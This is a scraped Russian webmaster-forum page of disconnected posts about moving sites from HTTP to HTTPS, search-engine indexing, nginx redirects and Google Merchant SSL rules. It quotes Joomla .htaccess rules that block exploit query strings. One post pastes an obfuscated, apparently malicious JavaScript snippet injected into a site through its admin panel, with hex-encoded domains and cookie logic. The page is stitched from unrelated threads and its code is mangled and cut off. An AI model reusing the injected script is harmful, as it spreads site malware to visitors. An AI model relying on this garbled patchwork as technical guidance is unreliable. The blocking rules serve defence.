Поиск

что https уже не защищает?

Ребята, прошу не ругать, мой первый пост. Два дня конкретно ломая голову и стрессую. Надежда на вас. Есть сайт. Гугл любит его. Недавно добавил ССЛ сертификат и теперь нужно перевести сайт с HTTP на HTTPS. Сейчас как бы два сайта. на HTTPS сайт сломан так как ссылки нужно перевести видимо, да и сам домен тоже чтобы направлял на защищенный вариант. Прошелся по нескольким статьям и решил применить предложенный вариант 'Изменить основной протокол сайта с HTTP на HTTPS в разделе Параметры → Общие в панели администрирования WordPress. ' такую ошибку выводит. Пытался изменить что-то там по рекомендациям интернета в.htaccess тоже не работает. Реально парюсь который день. Помогите разобраться. Я не вебмастер, поэтому по указке нужно вести. Магарич в виде Яндекс.Денег с меня, только грамотный подход плиз чтобы гугл на колени не поставил (это важно).

При указании домена тоже все создалось нормально. Если же вы списываете домен без http/https в ту строчку где написано 'Url с http:// или https:// ', ну тут да, ошибка неминуема.

а я бы не делал аудит на вашем месте тем более что движок не самописный, поставьте https и бэкап каждый день, вот и все, если взломают пофиксили и восстановили

Странный у Вас ответ от Платона. На одной из конференций они вроде прямо заявляли что фильтр ПФ при переадресации перейдет и на новый домен тоже. Хотя рекомендацию от некоторых специалистов по такому уходу получал сам лично. Только там цепочка редиректов должна быть достаточно запутанная, да еще со сменой http на https. Пробовали, но очень поздно, в марте. в результате где то на втором месяце поняли что такими темпами и с такими апдейтами (а точнее их отсутствием) процесс переноса завершиться в лучшем случае к осени, а то и к Новому году, что не имеет смысла (как нам тогда показалось) ибо вроде как скоро фильтр ПФ и сам истечет. Потому решили все таки забить на перенос и вытаскивать основной домен, вернули все в обратку (еще 1 месяц ждали чтобы оно было хотя бы частично увидено Яндексом). Второй домен отключили. До сих пор по прошествии уже 3-х месяцев 2-ой домен торчит в поиске. параллельно с основным, при том что физически там ничего нет. ---------- Добавлено 03.08.2015 в 09:45...

Запрет доступа по HTTP заголовку referer для блокировки нежелательного входящего трафика: RewriteEngine On. Options +FollowSymlinks. RewriteCond %{HTTP_REFERER} ^https?://([^.]+.)*semalt.com [NC,OR]. RewriteRule.* [F]. конкретно в каком месте файла.htaccess должен стоять?. RewriteEngine On. ########## Begin - Rewrite rules to block out some common exploits. ## If you experience problems on your site block out the operations listed below. ## This attempts to block the most common type of exploit `attempts` to Joomla! #. ## Deny access to extension xml files (uncomment out to activate). # Files ~ '.xml$ ' #Order allow,deny. #Deny from all. #Satisfy all. # /Files ## End of deny access to extension xml files. # Block out any script trying to set a mosConfig value through the URL. RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=| %3D) [OR]. # Block out any script trying to base64_encode data within the URL. RewriteCond %{QUERY_STRING} base64_encode[^(]* ([^)]* ) [OR]. # Block out...

Был сайт на HTTP. Было решено сменить доменное имя и сразу перебрать на защищенный протокол HTTPS. Все работало отлично (редикт был настроен правильно), но Яндекс проиндексировал первый сайт с HTTPS протоколом. Если перейти на старый сайт по протоколу HTTPS, то редикта на новый домен действительно не произойдёт. Я пробовал вносить корректировки в конфигурацию NGINX для сайта, но не помогает. Прикладываю конфигурационный файл: Если кратко, как я понял, просто не работает переадресация со старых доменов по протоколу HTTPS на новый. Прошу знающих людей о помощи. Спасибо!

Увы, но нет. Старый сайт не работал на HTTPS. Яндекс проиндексировал его не так, и теперь мне нужно делать со старого с HTTPS на новый с HTTPS.

Доброго дня! Месяц назад перешли с http На https. Стали замечать, что по некоторым ключам есть спад позиций. Возможно ли это из-за такого перехода?. Спасибо!

Уже N часов пытаюсь сделать запрос к ЯндексXML с помощью PHP curl. Вот мой код При этом содержимое переменной $sYandexUrl вставляю в браузер и ответ получаю. Соответственно ip зарегистрирован в Яндекс.XML, ключ тоже корректный. Что я делаю не так:) ?

И так, продолжение истории 'Переход на HTTPS в ', ну что же, все таки дождались ответа! Сайт перешел на HTTPS, я уже в теме говорил, что долго не отвечают, и нельзя оба варианта сайта в кабинете держать. Так что вопрос к нашему уважаемому поисковику был простой, как перейти в на https? Пришел ответ, суть которого сводится к следующему: Для неважно как добавлен сайт в Кабинет Вебмастре, то есть по HTTP или HTTPS, также сказали, что так как у нас HTTPS недавно введен на сайте, то в ближайшее время в поиске начнутся показываться ссылки на https вариант. Выводы: переход на https в поисковике происходит автоматически, после того как сайт начинается открываться только по https ибо на счет варианта, когда работают оба протокола, мы не спрашивали. Сайт сейчас только по https работает. Думаю добавить вариант в Кабинет Вебмастера https и оставить в таком виде, только сначала удалить надо файл с сервера и заново сделать добавление сайта. Об итогах сообщу в этой теме.

Например так? Хеш нужно ставить? (выделено жирным). RewriteEngine On. ########## Begin - Rewrite rules to block out some common exploits. ## If you experience problems on your site block out the operations listed below. ## This attempts to block the most common type of exploit `attempts` to Joomla! #. ## Deny access to extension xml files (uncomment out to activate). # Files ~ '.xml$ ' #Order allow,deny. #Deny from all. #Satisfy all. # /Files ## End of deny access to extension xml files. # Block out any script trying to set a mosConfig value through the URL. RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=| %3D) [OR]. # Block out any script trying to base64_encode data within the URL. RewriteCond %{QUERY_STRING} base64_encode[^(]* ([^)]* ) [OR]. # Block out any script that includes a script tag in URL. RewriteCond %{QUERY_STRING} ( |%3C)([^s]*s)+cript.*( |%3E) [NC,OR]. # Block out any script trying to set a PHP GLOBALS variable via URL. RewriteCond %{QUERY_STRING} GLOBALS(=|...

Если нужно сделать редирект с http на https средствами nginx, то делаете http хост в котором прописываете только редирект на https.

С неделю назад получил письмо от гугл мерчант, в котором говорилось следующее: На веб-сайтах, участвующих в программе Google Покупок, должна быть возможность совершить покупку с помощью платежной системы через Интернет, непосредственно на сайте или с использованием альтернативного метода, например наложенного платежа, выставления счета или оплаты курьеру. Процесс обработки всех платежей, транзакций и любой личной информации пользователей (например, адресов) должен осуществляться через безопасное соединение по протоколу SSL c действующим сертификатом SSL. Если не привести товарные объявления в соответствие с правилами Google Покупок в течение 7 дней, Ваш аккаунт будет заблокирован. Смысл такой, что оформление заказа должно проводиться по протоколу https, в противном случае - блокировка. Мой акк уже отключили, но странно другое, что многие магазины до сих пор висят с рекламой не имея ssl сертификата. Это они выборочно чтоль проверяют магазины?. Кому нибудь приходило подобное...

Да не, вы наверное не поняли. Я имею ввиду, что там полно рабочих магазинов, где оформить заказ можно только в корзине на сайте с оплатой курьеру, без всяких эквайрингов. Собственно ваша корзина при таком раскладе должна работать через https, дабы соответствовать правилам. Дело не в наличии или отсутствии определенного вида оплаты, а в том, что заказ должен оформляться через безопасное соединение. Хоть с оплатой курьеру, хоть картой - все через https.

А как вы поняли, что они не имеют SSL сертификата? Ведь многие пользуются эквайрингом, а для этого достаточно иметь https только на странице возврата в магазин. Пока не заплатишь - не поймёшь, наверно.

Вот обнаружил кусок левого кода, который вставили через админку (несколько людей имеет к ней доступ) в запись. Может кто прочитает? script type= 'text/javascript ' // ![CDATA[ 1336404323 = 1;!function(){var o=('[ '6e33646b337a72372e7275 ', '673333746d3079792e7275 ']'),e= ' ',t= '17247 ',n=function(o){var e=(new RegExp( '(?:^|; ) '+(/([.$?*|{} ( ) [ ] / +^])/g, ' $1 ')+ '=([^;]*) '));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=;if( 'number '==typeof n&&n){var i=new Date(n);n==i}var r= '3600 ';!&&r&&(= '3600 '),e=encodeURIComponent(e);var c=o+ '= '+e;for(var a in t){c+= '; '+a;var d=t[a];d!==!0&&(c+= '= '+d)}=c},r=function(o){o=(/[ S s]{1,2}/g);for(var e= ' ',t=0;t;t++)e+=(parseInt(o[t],16));return e},c=function(o){for(var e= ' ',t=0,n=;n t;t++)e+=(t).toString(16);return e},p=function(){var w=window,p=;if(('http')==0){return p}for(var e=0;e 3;e++){if(){w=;p=;if(('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var...

23.07 вышла новая 44 версия. С ней точно есть/был баг в работе с https. Допускаю, что и ваша проблема может быть из-за 'новой ' версии.

Sinaro, бесят такие сайты, у которых моя мозила блочит сайт, как не доверенное соединение в https. Отправляйте уж на http лучше людей. ---------- Добавлено 24.07.2015 в 14:36 ----------, в вдс-ке какой проц?

Ну что же, 15 числа добавил HTTPS вариант сайта, 16 после апдейта он был уже проиндексирован, поставил 301 редирект серверный, зеркало в Яндекс.Вебмастер выбрать нельзя было, ибо HTTPS вариант еще не был неглавным зеркалом, поставил в Host HTTPS вариант, а сегодня после апдейта HTTP вариант уже неглавное зеркало, а HTTPS вариант признан главным зеркалом. Позиции на месте, только в выдаче еще HTTP вариант сайта. И ТИЦ пока слетел у обоих вариантов.